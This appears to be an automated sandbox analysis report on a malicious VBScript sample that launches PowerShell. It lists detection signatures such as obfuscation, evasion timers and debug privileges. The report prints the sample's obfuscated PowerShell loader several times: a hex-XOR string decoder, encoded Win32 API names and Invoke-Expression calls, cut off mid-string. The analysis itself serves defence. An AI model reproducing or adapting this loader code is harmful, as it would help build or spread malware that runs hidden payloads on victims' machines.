Source: classification engine Classification label: mal60.evad.winVBS@6/3@0/0
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell.exe "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFet", "0")
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3215 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$paraple = """prefmreulaunpenclivtbleisrvoscynbid remhpyrtgenbvid kns{obj man pin hol whipsluafetrhreabatmdar(avi[navsskuttilrspeikronfisggan]she`$halcmodaspimradpreneluemmumematnmes)cro;imp res bif ovi pac`$utolevaaprordridtraelay rho=syg connvegespiwraa-stiofaibbemjbeketaacmictbln neobforytrotdjvebog[sam]pri pro(qua`$lancsmpaunnmrodpbadeanambalenonnins.raklsteesadnstigsertheghlej and/eol hyl2lav)pro;som kle sub lip arafdisotilrfor(pse`$unftgteustarrvelsto=bla0jer;out ste`$udstskausparfrpluvu sej-penlunmtsal sla`$pescvskasofmpropgadepermadaeafknund.stulbefestanrdggsuctreghins;unh fas`$monteudumunrspelopg+ald=mid2nst)lse{fea udp qui din bak byn rev gul mis`$blklfosascormicddatewom[agr`$outtunludokrrullesd/phi2res]ado pse=neg rum[phicdatosalnlntvbroenocrasitfry]uds:avn:hantcleoforbsagyniltireeafn(sce`$boycfusaappmoutpheleakamegleynknmel.tarsvrduknibrelsfustbarrjeaisadnhelgrll(cas`$mettudbueurrpenlinh,phy stu2und)gra,hop arn1mod6squ)lse;mel fro baa`$skolparaundrtundvinecru[bra`$baltkopucimrdimlcon/blo2alt]mis tit=pan web(dis`$byplinkafrarholdsupecas[eks`$protdooutonrcorlfeb/ste2afp]prt ocu-bolbfelxbatoturrtam cow8con9unm)non;god wum exe ned aha}for dri[nonsthrtstarkaripannrengetr]sty[spisantylyksskotalleposmunr.nedthydeskixdritdeb.udledomnsmicpanocoadmisimicnhydguun]dal:bil:skoamensegecklaicelibas.afgghezeunotindsfugtsynrtelimornfyrghov(kon`$alklgodacrerfildsadeafr)sav;san}uta`$addahjensodtorgoovenwil0ank=gruhthrtchubbra min'coi0paraslu2mas0tas2endatra2kurdsma3takchiv3tet4sju7evy7stj3intdsab3pec5for3str5duo'ove;tem`$antatrununctunfopatnblu1moo=lamhsigtavibklu bla'fri1bli4kut3cor0sik3podasum2hjubked3udv6pol2fasadir3bik6bus3anvfesc2misdwel7mal7per0reaehol3req0kao3unh7ove6resagra6subbmjs7for7pro0forcgon3sco7und2rydaifr3kon8asm3excfnya3anscspa1mar7tri3kor8jag2unpdlse3san0ube2polffor3bulcchr1fru4def3tykcdra2sjudupa3khi1gre3ant6cho3quidcar2tinaass'kli;tvr`$yeoafabnmusttreotodnres2soc=epihindtsacbsde aut'spa1dybebea3dencboo2diadser0dis9cig2pribbla3fre6vag3lokascr1for8bun3iridkom3unpdoma2drobgas3ripccoa2carasin2gunagoo'lyd;bef`$baraxannovetritodepndry3nas=psehoentpakbwar sca'tek0baradel2pju0bra2conaman2ottdmed3gerctra3reg4ind7uns7top0dixbsel2nymckom3tan7pte2doldsud3mcc0bra3sta4epi3orncstu7for7gar1stn0til3sen7mic2nihdins3seccemb2stvbann3reg6opl2fra9dow0undablo3oescval2febbrum2bekfnon3las0spi3skaabli3jumchaz2tedahor7lea7aft1hid1reg3afr8udb3kon7sej3dafdred3kno5men3mylcpos0nonbdis3mddcsyk3afffper'for;tnd`$nitatilnopmtforofinncoa4sto=opshmagtcodbunq und'leg2hazambl2soldtra2butbkir3par0str3bib7mis3museino'nic;cou`$tilapalnpritlavoultnove5tva=anthsejtskrbdem tra'sor1staeend3merckon2sandmim1fla4udf3ver6mil3needbri2skfckum3ing5lyr3sanckis1saf1ned3vel8coe3plo7kol3desdfor3tap5con3torcafr'unf;tor`$kliaandnmertbloovejnker6hij=molhlehtbarbdis pac'stu0udsbpol0snddlis0enfasyp2cam9lin3bescsta3milaune3bac0brn3mar8bra3int5vog1mus7cou3arb8fis3rea4dop3tracpri7p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$campemen); $larde = new-object byte[] ($campemen.length / 2); for($turl=0; $turl -lt $campemen.length; $turl+=2){ $larde[$turl/2] = [convert]::tobyte($campemen.substring($turl, 2), 16); $larde[$turl/2] = ($larde[$turl/2] -bxor 89); } [string][system.text.encoding]::ascii.getstring($larde);}$anton0=htb '0a202a2d3c34773d3535';$anton1=htb '14303a2b362a363f2d770e30376a6b770c372a383f3c17382d302f3c143c2d31363d2a';$anton2=htb '1e3c2d092b363a183d3d2b3c2a2a';$anton3=htb '0a202a2d3c34770b2c372d30343c7710372d3c2b36290a3c2b2f303a3c2a771138373d353c0b3c3f';$anton4=htb '2a2d2b30373e';$anton5=htb '1e3c2d14363d2c353c1138373d353c';$anton6=htb '0b0d0a293c3a3038351738343c757911303d3c1b200a303e7579092c3b35303a';$anton7=htb '0b2c372d30343c7579143837383e3c3d';$anton8=htb '0b3c3f353c3a2d3c3d1d3c353c3e382d3c';$anton9=htb '1037143c34362b2014363d2c353c';$unitedn0=htb '14201d3c353c3e382d3c0d20293c';$unitedn1=htb '1a35382a2a7579092c3b35303a75790a3c38353c3d757918372a301a35382a2a7579182c2d361a35382a2a';$unitedn2=htb '10372f36323c';$unitedn3=htb '092c3b35303a757911303d3c1b200a303e7579173c2e0a35362d75790f302b2d2c3835';$unitedn4=htb '0f302b2d2c3835183535363a';$unitedn5=htb '372d3d3535';$unitedn6=htb '172d092b362d3c3a2d0f302b2d2c3835143c34362b20';$unitedn7=htb '101c01';$unitedn8=htb '05';function fkp {param ($patro40, $selvf) ;$cont0 =htb '7d1d303a2d382d3679647971021829291d36343830370463631a2c2b2b3c372d1d3634383037771e3c2d182a2a3c343b35303c2a71707925790e313c2b3c74163b333c3a2d7922797d06771e35363b3835182a2a3c343b35201a383a313c797418373d797d067715363a382d303637770a2935302d717d0c37302d3c3d37617002746804771c282c38352a717d38372d36376970792470771e3c2d0d20293c717d38372d36376870';&($unitedn7) $cont0;$cont5 = htb '7d1b2b3c3d3d7964797d1d303a2d382d36771e3c2d143c2d31363d717d38372d36376b7579020d20293c0204047919717d38372d36376a75797d38372d36376d7070';&($unitedn7) $cont5;$cont1 = htb '2b3c2d2c2b37797d1b2b3c3d3d7710372f36323c717d372c353575791971020a202a2d3c34770b2c372d30343c7710372d3c2b36290a3c2b2f303a3c2a771138373d353c0b3c3f0471173c2e74163b333c3a2d790a202a2d3c34770b2c372d30343c7710372d3c2b36290a3c2b2f303a3c2a771138373d353c0b3c3f7171173c2e74163b333c3a2d7910372d092d2b707579717d1d303a2d382d36771e3c2d143c2d31363d717d38372d36376c70707710372f36323c717d372c3535757919717d09382d2b366d697070707075797d0a3c352f3f7070';&($unitedn7) $cont1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $knsski,[parameter(position = 1)] [type] $semitiskeo = [void]);$cont2 = htb '7d0f363a382d3036796479021829291d36343830370463631a2c2b2b3c372d1d3634383037771d3c3f30373c1d20373834303a182a2a3c343b35207171173c2e74163b333c3a2d790a202a2d3c34770b3c3f353c3a2d30363777182a2a3c343b35201738343c717d38372d36376170707579020a202a2d3c34770b3c3f353c3a2d303637771c34302d77182a2a3c343b35201b2c30353d3c2b183a3a3c2a2a0463630b2c3770771d3c3f30373c1d2037383430
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$paraple = """prefmreulaunpenclivtbleisrvoscynbid remhpyrtgenbvid kns{obj man pin hol whipsluafetrhreabatmdar(avi[navsskuttilrspeikronfisggan]she`$halcmodaspimradpreneluemmumematnmes)cro;imp res bif ovi pac`$utolevaaprordridtraelay rho=syg connvegespiwraa-stiofaibbemjbeketaacmictbln neobforytrotdjvebog[sam]pri pro(qua`$lancsmpaunnmrodpbadeanambalenonnins.raklsteesadnstigsertheghlej and/eol hyl2lav)pro;som kle sub lip arafdisotilrfor(pse`$unftgteustarrvelsto=bla0jer;out ste`$udstskausparfrpluvu sej-penlunmtsal sla`$pescvskasofmpropgadepermadaeafknund.stulbefestanrdggsuctreghins;unh fas`$monteudumunrspelopg+ald=mid2nst)lse{fea udp qui din bak byn rev gul mis`$blklfosascormicddatewom[agr`$outtunludokrrullesd/phi2res]ado pse=neg rum[phicdatosalnlntvbroenocrasitfry]uds:avn:hantcleoforbsagyniltireeafn(sce`$boycfusaappmoutpheleakamegleynknmel.tarsvrduknibrelsfustbarrjeaisadnhelgrll(cas`$mettudbueurrpenlinh,phy stu2und)gra,hop arn1mod6squ)lse;mel fro baa`$skolparaundrtundvinecru[bra`$baltkopucimrdimlcon/blo2alt]mis tit=pan web(dis`$byplinkafrarholdsupecas[eks`$protdooutonrcorlfeb/ste2afp]prt ocu-bolbfelxbatoturrtam cow8con9unm)non;god wum exe ned aha}for dri[nonsthrtstarkaripannrengetr]sty[spisantylyksskotalleposmunr.nedthydeskixdritdeb.udledomnsmicpanocoadmisimicnhydguun]dal:bil:skoamensegecklaicelibas.afgghezeunotindsfugtsynrtelimornfyrghov(kon`$alklgodacrerfildsadeafr)sav;san}uta`$addahjensodtorgoovenwil0ank=gruhthrtchubbra min'coi0paraslu2mas0tas2endatra2kurdsma3takchiv3tet4sju7evy7stj3intdsab3pec5for3str5duo'ove;tem`$antatrununctunfopatnblu1moo=lamhsigtavibklu bla'fri1bli4kut3cor0sik3podasum2hjubked3udv6pol2fasadir3bik6bus3anvfesc2misdwel7mal7per0reaehol3req0kao3unh7ove6resagra6subbmjs7for7pro0forcgon3sco7und2rydaifr3kon8asm3excfnya3anscspa1mar7tri3kor8jag2unpdlse3san0ube2polffor3bulcchr1fru4def3tykcdra2sjudupa3khi1gre3ant6cho3quidcar2tinaass'kli;tvr`$yeoafabnmusttreotodnres2soc=epihindtsacbsde aut'spa1dybebea3dencboo2diadser0dis9cig2pribbla3fre6vag3lokascr1for8bun3iridkom3unpdoma2drobgas3ripccoa2carasin2gunagoo'lyd;bef`$baraxannovetritodepndry3nas=psehoentpakbwar sca'tek0baradel2pju0bra2conaman2ottdmed3gerctra3reg4ind7uns7top0dixbsel2nymckom3tan7pte2doldsud3mcc0bra3sta4epi3orncstu7for7gar1stn0til3sen7mic2nihdins3seccemb2stvbann3reg6opl2fra9dow0undablo3oescval2febbrum2bekfnon3las0spi3skaabli3jumchaz2tedahor7lea7aft1hid1reg3afr8udb3kon7sej3dafdred3kno5men3mylcpos0nonbdis3mddcsyk3afffper'for;tnd`$nitatilnopmtforofinncoa4sto=opshmagtcodbunq und'leg2hazambl2soldtra2butbkir3par0str3bib7mis3museino'nic;cou`$tilapalnpritlavoultnove5tva=anthsejtskrbdem tra'sor1staeend3merckon2sandmim1fla4udf3ver6mil3needbri2skfckum3ing5lyr3sanckis1saf1ned3vel8coe3plo7kol3desdfor3tap5con3torcafr'unf;tor`$kliaandnmertbloovejnker6hij=molhlehtbarbdis pac'stu0udsbpol0snddlis0enfasyp2cam9lin3bescsta3milaune3bac0brn3mar8bra3int5vog1mus7cou3arb8fis3rea4dop3tracpri7p Jump to behavior
